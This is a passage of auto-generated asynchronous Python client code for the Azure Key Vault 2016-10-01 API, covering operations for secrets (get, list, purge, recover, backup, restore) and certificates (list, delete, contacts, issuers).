:param secret_name: The name of the secret.
:type secret_name: str
:param secret_version: The version of the secret.
:type secret_version: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: SecretBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.SecretBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SecretBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.get_secret.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'secret-name': self._serialize.url("secret_name", secret_name, 'str'),
'secret-version': self._serialize.url("secret_version", secret_version, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('SecretBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_secret.metadata = {'url': '/secrets/{secret-name}/{secret-version}'} # type: ignore
def get_secrets(
self,
vault_base_url: str,
maxresults: Optional[int] = None,
**kwargs: Any
) -> AsyncIterable["_models.SecretListResult"]:
"""List secrets in a specified key vault.
The Get Secrets operation is applicable to the entire vault. However, only the base secret
identifier and its attributes are provided in the response. Individual secret versions are not
listed in the response. This operation requires the secrets/list permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param maxresults: Maximum number of results to return in a page. If not specified, the service
will return up to 25 results.
:type maxresults: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either SecretListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.keyvault.v2016_10_01.models.SecretListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SecretListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.get_secrets.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if maxresults is not None:
query_parameters['maxresults'] = self._serialize.query("maxresults", maxresults, 'int', maximum=25, minimum=1)
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('SecretListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
get_secrets.metadata = {'url': '/secrets'} # type: ignore
def get_secret_versions(
self,
vault_base_url: str,
secret_name: str,
maxresults: Optional[int] = None,
**kwargs: Any
) -> AsyncIterable["_models.SecretListResult"]:
"""List all versions of the specified secret.
The full secret identifier and attributes are provided in the response. No values are returned
for the secrets. This operations requires the secrets/list permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param secret_name: The name of the secret.
:type secret_name: str
:param maxresults: Maximum number of results to return in a page. If not specified, the service
will return up to 25 results.
:type maxresults: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either SecretListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.keyvault.v2016_10_01.models.SecretListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SecretListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.get_secret_versions.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'secret-name': self._serialize.url("secret_name", secret_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if maxresults is not None:
query_parameters['maxresults'] = self._serialize.query("maxresults", maxresults, 'int', maximum=25, minimum=1)
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'secret-name': self._serialize.url("secret_name", secret_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('SecretListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
get_secret_versions.metadata = {'url': '/secrets/{secret-name}/versions'} # type: ignore
def get_deleted_secrets(
self,
vault_base_url: str,
maxresults: Optional[int] = None,
**kwargs: Any
) -> AsyncIterable["_models.DeletedSecretListResult"]:
"""Lists deleted secrets for the specified vault.
The Get Deleted Secrets operation returns the secrets that have been deleted for a vault
enabled for soft-delete. This operation requires the secrets/list permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param maxresults: Maximum number of results to return in a page. If not specified the service
will return up to 25 results.
:type maxresults: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either DeletedSecretListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.keyvault.v2016_10_01.models.DeletedSecretListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DeletedSecretListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.get_deleted_secrets.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if maxresults is not None:
query_parameters['maxresults'] = self._serialize.query("maxresults", maxresults, 'int', maximum=25, minimum=1)
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('DeletedSecretListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
get_deleted_secrets.metadata = {'url': '/deletedsecrets'} # type: ignore
async def get_deleted_secret(
self,
vault_base_url: str,
secret_name: str,
**kwargs: Any
) -> "_models.DeletedSecretBundle":
"""Gets the specified deleted secret.
The Get Deleted Secret operation returns the specified deleted secret along with its
attributes. This operation requires the secrets/get permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param secret_name: The name of the secret.
:type secret_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: DeletedSecretBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.DeletedSecretBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DeletedSecretBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.get_deleted_secret.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'secret-name': self._serialize.url("secret_name", secret_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('DeletedSecretBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_deleted_secret.metadata = {'url': '/deletedsecrets/{secret-name}'} # type: ignore
async def purge_deleted_secret(
self,
vault_base_url: str,
secret_name: str,
**kwargs: Any
) -> None:
"""Permanently deletes the specified secret.
The purge deleted secret operation removes the secret permanently, without the possibility of
recovery. This operation can only be enabled on a soft-delete enabled vault. This operation
requires the secrets/purge permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param secret_name: The name of the secret.
:type secret_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.purge_deleted_secret.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'secret-name': self._serialize.url("secret_name", secret_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
purge_deleted_secret.metadata = {'url': '/deletedsecrets/{secret-name}'} # type: ignore
async def recover_deleted_secret(
self,
vault_base_url: str,
secret_name: str,
**kwargs: Any
) -> "_models.SecretBundle":
"""Recovers the deleted secret to the latest version.
Recovers the deleted secret in the specified vault. This operation can only be performed on a
soft-delete enabled vault. This operation requires the secrets/recover permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param secret_name: The name of the deleted secret.
:type secret_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: SecretBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.SecretBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SecretBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.recover_deleted_secret.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'secret-name': self._serialize.url("secret_name", secret_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('SecretBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
recover_deleted_secret.metadata = {'url': '/deletedsecrets/{secret-name}/recover'} # type: ignore
async def backup_secret(
self,
vault_base_url: str,
secret_name: str,
**kwargs: Any
) -> "_models.BackupSecretResult":
"""Backs up the specified secret.
Requests that a backup of the specified secret be downloaded to the client. All versions of the
secret will be downloaded. This operation requires the secrets/backup permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param secret_name: The name of the secret.
:type secret_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: BackupSecretResult, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.BackupSecretResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.BackupSecretResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.backup_secret.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'secret-name': self._serialize.url("secret_name", secret_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('BackupSecretResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
backup_secret.metadata = {'url': '/secrets/{secret-name}/backup'} # type: ignore
async def restore_secret(
self,
vault_base_url: str,
parameters: "_models.SecretRestoreParameters",
**kwargs: Any
) -> "_models.SecretBundle":
"""Restores a backed up secret to a vault.
Restores a backed up secret, and all its versions, to a vault. This operation requires the
secrets/restore permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param parameters: The parameters to restore the secret.
:type parameters: ~azure.keyvault.v2016_10_01.models.SecretRestoreParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: SecretBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.SecretBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SecretBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.restore_secret.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'SecretRestoreParameters')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('SecretBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
restore_secret.metadata = {'url': '/secrets/restore'} # type: ignore
def get_certificates(
self,
vault_base_url: str,
maxresults: Optional[int] = None,
**kwargs: Any
) -> AsyncIterable["_models.CertificateListResult"]:
"""List certificates in a specified key vault.
The GetCertificates operation returns the set of certificates resources in the specified key
vault. This operation requires the certificates/list permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param maxresults: Maximum number of results to return in a page. If not specified the service
will return up to 25 results.
:type maxresults: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either CertificateListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.keyvault.v2016_10_01.models.CertificateListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.CertificateListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.get_certificates.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if maxresults is not None:
query_parameters['maxresults'] = self._serialize.query("maxresults", maxresults, 'int', maximum=25, minimum=1)
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('CertificateListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
get_certificates.metadata = {'url': '/certificates'} # type: ignore
async def delete_certificate(
self,
vault_base_url: str,
certificate_name: str,
**kwargs: Any
) -> "_models.DeletedCertificateBundle":
"""Deletes a certificate from a specified key vault.
Deletes all versions of a certificate object along with its associated policy. Delete
certificate cannot be used to remove individual versions of a certificate object. This
operation requires the certificates/delete permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param certificate_name: The name of the certificate.
:type certificate_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: DeletedCertificateBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.DeletedCertificateBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DeletedCertificateBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.delete_certificate.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'certificate-name': self._serialize.url("certificate_name", certificate_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('DeletedCertificateBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
delete_certificate.metadata = {'url': '/certificates/{certificate-name}'} # type: ignore
async def set_certificate_contacts(
self,
vault_base_url: str,
contacts: "_models.Contacts",
**kwargs: Any
) -> "_models.Contacts":
"""Sets the certificate contacts for the specified key vault.
Sets the certificate contacts for the specified key vault. This operation requires the
certificates/managecontacts permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param contacts: The contacts for the key vault certificate.
:type contacts: ~azure.keyvault.v2016_10_01.models.Contacts
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Contacts, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.Contacts
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Contacts"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.set_certificate_contacts.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(contacts, 'Contacts')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('Contacts', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
set_certificate_contacts.metadata = {'url': '/certificates/contacts'} # type: ignore
async def get_certificate_contacts(
self,
vault_base_url: str,
**kwargs: Any
) -> "_models.Contacts":
"""Lists the certificate contacts for a specified key vault.
The GetCertificateContacts operation returns the set of certificate contact resources in the
specified key vault. This operation requires the certificates/managecontacts permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Contacts, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.Contacts
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Contacts"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.get_certificate_contacts.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('Contacts', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_certificate_contacts.metadata = {'url': '/certificates/contacts'} # type: ignore
async def delete_certificate_contacts(
self,
vault_base_url: str,
**kwargs: Any
) -> "_models.Contacts":
"""Deletes the certificate contacts for a specified key vault.
Deletes the certificate contacts for a specified key vault certificate. This operation requires
the certificates/managecontacts permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Contacts, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.Contacts
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Contacts"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.delete_certificate_contacts.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('Contacts', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
delete_certificate_contacts.metadata = {'url': '/certificates/contacts'} # type: ignore
def get_certificate_issuers(
self,
vault_base_url: str,
maxresults: Optional[int] = None,
**kwargs: Any
) -> AsyncIterable["_models.CertificateIssuerListResult"]:
"""List certificate issuers for a specified key vault.
The GetCertificateIssuers operation returns the set of certificate issuer resources in the
specified key vault. This operation requires the certificates/manageissuers/getissuers
permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param maxresults: Maximum number of results to return in a page. If not specified the service
will return up to 25 results.
:type maxresults: int
